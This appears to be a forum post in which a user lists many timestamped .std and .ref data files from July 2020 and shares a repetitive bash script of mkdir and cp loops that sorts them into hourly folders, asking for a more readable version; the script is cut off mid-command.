aaaaaa-bbbb-cc10dddd-L1-202007012039-09.std aaaaaa-bbbb-cc10dddd-L1-202007012039-10.std aaaaaa-bbbb-cc10dddd-L1-202007012039.ref aaaaaa-bbbb-cc10dddd-L1-202007012050-00.std aaaaaa-bbbb-cc10dddd-L1-202007012050-01.std aaaaaa-bbbb-cc10dddd-L1-202007012050-02.std aaaaaa-bbbb-cc10dddd-L1-202007012050-03.std aaaaaa-bbbb-cc10dddd-L1-202007012050-04.std aaaaaa-bbbb-cc10dddd-L1-202007012050-05.std aaaaaa-bbbb-cc10dddd-L1-202007012050-06.std aaaaaa-bbbb-cc10dddd-L1-202007012050-07.std aaaaaa-bbbb-cc10dddd-L1-202007012050-08.std aaaaaa-bbbb-cc10dddd-L1-202007012050-09.std aaaaaa-bbbb-cc10dddd-L1-202007012050-10.std aaaaaa-bbbb-cc10dddd-L1-202007012050.ref aaaaaa-bbbb-cc10dddd-L1-202007012102-00.std aaaaaa-bbbb-cc10dddd-L1-202007012102-01.std aaaaaa-bbbb-cc10dddd-L1-202007012102-02.std aaaaaa-bbbb-cc10dddd-L1-202007012102-03.std aaaaaa-bbbb-cc10dddd-L1-202007012102-04.std aaaaaa-bbbb-cc10dddd-L1-202007012102-05.std aaaaaa-bbbb-cc10dddd-L1-202007012102-06.std aaaaaa-bbbb-cc10dddd-L1-202007012102-07.std aaaaaa-bbbb-cc10dddd-L1-202007012102-08.std aaaaaa-bbbb-cc10dddd-L1-202007012102-09.std aaaaaa-bbbb-cc10dddd-L1-202007012102-10.std aaaaaa-bbbb-cc10dddd-L1-202007012102.ref aaaaaa-bbbb-cc10dddd-L1-202007012113-00.std aaaaaa-bbbb-cc10dddd-L1-202007012113-01.std aaaaaa-bbbb-cc10dddd-L1-202007012113-02.std aaaaaa-bbbb-cc10dddd-L1-202007012113-03.std aaaaaa-bbbb-cc10dddd-L1-202007012113-04.std aaaaaa-bbbb-cc10dddd-L1-202007012113-05.std aaaaaa-bbbb-cc10dddd-L1-202007012113-06.std aaaaaa-bbbb-cc10dddd-L1-202007012113-07.std aaaaaa-bbbb-cc10dddd-L1-202007012113-08.std aaaaaa-bbbb-cc10dddd-L1-202007012113-09.std aaaaaa-bbbb-cc10dddd-L1-202007012113-10.std aaaaaa-bbbb-cc10dddd-L1-202007012113.ref aaaaaa-bbbb-cc10dddd-L1-202007012125-00.std aaaaaa-bbbb-cc10dddd-L1-202007012125-01.std aaaaaa-bbbb-cc10dddd-L1-202007012125-02.std aaaaaa-bbbb-cc10dddd-L1-202007012125-03.std aaaaaa-bbbb-cc10dddd-L1-202007012125-04.std aaaaaa-bbbb-cc10dddd-L1-202007012125-05.std aaaaaa-bbbb-cc10dddd-L1-202007012125-06.std aaaaaa-bbbb-cc10dddd-L1-202007012125-07.std aaaaaa-bbbb-cc10dddd-L1-202007012125-08.std aaaaaa-bbbb-cc10dddd-L1-202007012125-09.std aaaaaa-bbbb-cc10dddd-L1-202007012125-10.std aaaaaa-bbbb-cc10dddd-L1-202007012125.ref aaaaaa-bbbb-cc10dddd-L1-202007012136-00.std aaaaaa-bbbb-cc10dddd-L1-202007012136-01.std aaaaaa-bbbb-cc10dddd-L1-202007012136-02.std aaaaaa-bbbb-cc10dddd-L1-202007012136-03.std aaaaaa-bbbb-cc10dddd-L1-202007012136-04.std aaaaaa-bbbb-cc10dddd-L1-202007012136-05.std aaaaaa-bbbb-cc10dddd-L1-202007012136-06.std aaaaaa-bbbb-cc10dddd-L1-202007012136-07.std aaaaaa-bbbb-cc10dddd-L1-202007012136-08.std aaaaaa-bbbb-cc10dddd-L1-202007012136-09.std aaaaaa-bbbb-cc10dddd-L1-202007012136-10.std aaaaaa-bbbb-cc10dddd-L1-202007012136.ref aaaaaa-bbbb-cc10dddd-L1-202007012148-00.std aaaaaa-bbbb-cc10dddd-L1-202007012148-01.std aaaaaa-bbbb-cc10dddd-L1-202007012148-02.std aaaaaa-bbbb-cc10dddd-L1-202007012148-03.std aaaaaa-bbbb-cc10dddd-L1-202007012148-04.std aaaaaa-bbbb-cc10dddd-L1-202007012148-05.std aaaaaa-bbbb-cc10dddd-L1-202007012148-06.std aaaaaa-bbbb-cc10dddd-L1-202007012148-07.std aaaaaa-bbbb-cc10dddd-L1-202007012148-08.std aaaaaa-bbbb-cc10dddd-L1-202007012148-09.std aaaaaa-bbbb-cc10dddd-L1-202007012148-10.std aaaaaa-bbbb-cc10dddd-L1-202007012148.ref aaaaaa-bbbb-cc10dddd-L1-202007012159-00.std aaaaaa-bbbb-cc10dddd-L1-202007012159-01.std aaaaaa-bbbb-cc10dddd-L1-202007012159-02.std aaaaaa-bbbb-cc10dddd-L1-202007012159-03.std aaaaaa-bbbb-cc10dddd-L1-202007012159-04.std aaaaaa-bbbb-cc10dddd-L1-202007012159-05.std aaaaaa-bbbb-cc10dddd-L1-202007012159-06.std aaaaaa-bbbb-cc10dddd-L1-202007012159-07.std aaaaaa-bbbb-cc10dddd-L1-202007012159-08.std aaaaaa-bbbb-cc10dddd-L1-202007012159-09.std aaaaaa-bbbb-cc10dddd-L1-202007012159-10.std aaaaaa-bbbb-cc10dddd-L1-202007012159.ref aaaaaa-bbbb-cc10-dddd-L1-202007012211-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012211.ref aaaaaa-bbbb-cc10-dddd-L1-202007012222-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012222.ref aaaaaa-bbbb-cc10-dddd-L1-202007012234-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012234.ref aaaaaa-bbbb-cc10-dddd-L1-202007012245-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012245.ref aaaaaa-bbbb-cc10-dddd-L1-202007012257-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012257.ref aaaaaa-bbbb-cc10-dddd-L1-202007012308-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012308.ref aaaaaa-bbbb-cc10-dddd-L1-202007012319-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012319.ref aaaaaa-bbbb-cc10-dddd-L1-202007012331-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012331.ref aaaaaa-bbbb-cc10-dddd-L1-202007012342-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012342.ref aaaaaa-bbbb-cc10-dddd-L1-202007012354-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012354.ref aaaaaa-bbbb-cc10-dddd-L1-202007020005-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020005.ref aaaaaa-bbbb-cc10-dddd-L1-202007020017-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020017.ref aaaaaa-bbbb-cc10-dddd-L1-202007020028-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020028.ref aaaaaa-bbbb-cc10-dddd-L1-202007020040-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020040.ref aaaaaa-bbbb-cc10-dddd-L1-202007020051-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020051.ref aaaaaa-bbbb-cc10-dddd-L1-202007020103-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020103.ref aaaaaa-bbbb-cc10-dddd-L1-202007020114-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020114.ref aaaaaa-bbbb-cc10-dddd-L1-202007020125-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020125.ref aaaaaa-bbbb-cc10-dddd-L1-202007020137-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020137.ref aaaaaa-bbbb-cc10-dddd-L1-202007020148-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020148-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020148.ref aaaaaa-bbbb-cc10-dddd-L1-202007020200-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020200-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020200.ref aaaaaa-bbbb-cc10-dddd-L1-202007020211-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020211-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020211.ref aaaaaa-bbbb-cc10-dddd-L1-202007020223-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020223-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020223.ref aaaaaa-bbbb-cc10-dddd-L1-202007020234-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020234-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020234.ref aaaaaa-bbbb-cc10-dddd-L1-202007020246-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020246-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020246.ref aaaaaa-bbbb-cc10-dddd-L1-202007020257-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020257-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020257.refSCRIPT I USED. LOOKING FOR SOMETHING MORE READABLE. Crazy but this script actually works. The first part is to set the home directory. # if the input directory has a trailing slash, remove itif [ ! -z "$1" ]; then # remove trailing slash basedir=`echo "$1" | sed -e "s/\/$//"` else # copy dirname basedir=$1 fiif [ ! -d $basedir ]; then echo "Fatal error, argument is not a local directory -- bailing" exit 1 fi#!/bin/sh #mkdir $sortdir/sortfor i in {11..23}; do mkdir $hrdir/01"$i" donefor i in {00..08}; do mkdir $hrdir/02"$i" donefor i in {01..10}; do mkdir $elevdir1/0111-"$i" donefor i in {01..10}; do mkdir $elevdir2/0112-"$i" donefor i in {01..10}; do mkdir $elevdir3/0113-"$i" donefor i in {01..10}; do mkdir $elevdir4/0114-"$i" donefor i in {01..10}; do mkdir $elevdir5/0115-"$i" donefor i in {01..10}; do mkdir $elevdir6/0116-"$i" donefor i in {01..10}; do mkdir $elevdir7/0117-"$i" donefor i in {01..10}; do mkdir $elevdir8/0118-"$i" donefor i in {01..10}; do mkdir $elevdir9/0119-"$i" donefor i in {01..10}; do mkdir $elevdir10/0120-"$i" donefor i in {01..10}; do mkdir $elevdir11/0121-"$i" donefor i in {01..10}; do mkdir $elevdir12/0122-"$i" donefor i in {01..10}; do mkdir $elevdir13/0123-"$i" donefor i in {01..10}; do mkdir $elevdir14/0200-"$i" donefor i in {01..10}; do mkdir $elevdir15/0201-"$i" donefor i in {01..10}; do mkdir $elevdir16/0202-"$i" donefor i in {01..10}; do mkdir $elevdir17/0203-"$i" donefor i in {01..10}; do mkdir $elevdir18/0204-"$i" donefor i in {01..10}; do mkdir $elevdir19/0205-"$i" donefor i in {01..10}; do mkdir $elevdir20/0206-"$i" donefor i in {01..10}; do mkdir $elevdir21/0207-"$i" donefor i in {01..10}; do mkdir $elevdir22/0208-"$i" donefor i in {11..23}; do mkdir $hrdir/01"$i"/01"$i"-ref donefor i in {00..08}; do mkdir $hrdir/02"$i"/02"$i"-ref donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070111*-"$i".std $elevdir1/0111-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070112*-"$i".std $elevdir2/0112-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070113*-"$i".std $elevdir3/0113-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070114*-"$i".std $elevdir4/0114-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070115*-"$i".std $elevdir5/0115-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070116*-"$i".std $elevdir6/0116-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070117*-"$i".std $elevdir7/0117-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070118*-"$i".std $elevdir8/0118-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070119*-"$i".std $elevdir9/0119-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070120*-"$i".std $elevdir10/0120-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070121*-"$i".std $elevdir11/0121-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070122*-"$i".std $elevdir12/0122-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070123*-"$i".std $elevdir13/0123-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070200*-"$i".std $elevdir14/0200-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070201*-"$i".std $elevdir15/0201-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070202*-"$i".std $elevdir16/0202-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070203*-"$i".std $elevdir17/0203-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070204*-"$i".std $elevdir18/0204-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070205*-"$i".std $elevdir19/0205-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070206*-"$i".std $elevdir20/0206-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070207*-"$i".std $elevdir21/0207-"$i" donefor i in {01..10}; do cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070208*-"$i".std $elevdir22/0208-"$i" donecp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070111*.ref $elevdir1/0111-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070112*.ref $elevdir2/0112-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070113*.ref $elevdir3/0113-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070114*.ref $elevdir4/0114-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070115*.ref $elevdir5/0115-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070116*.ref 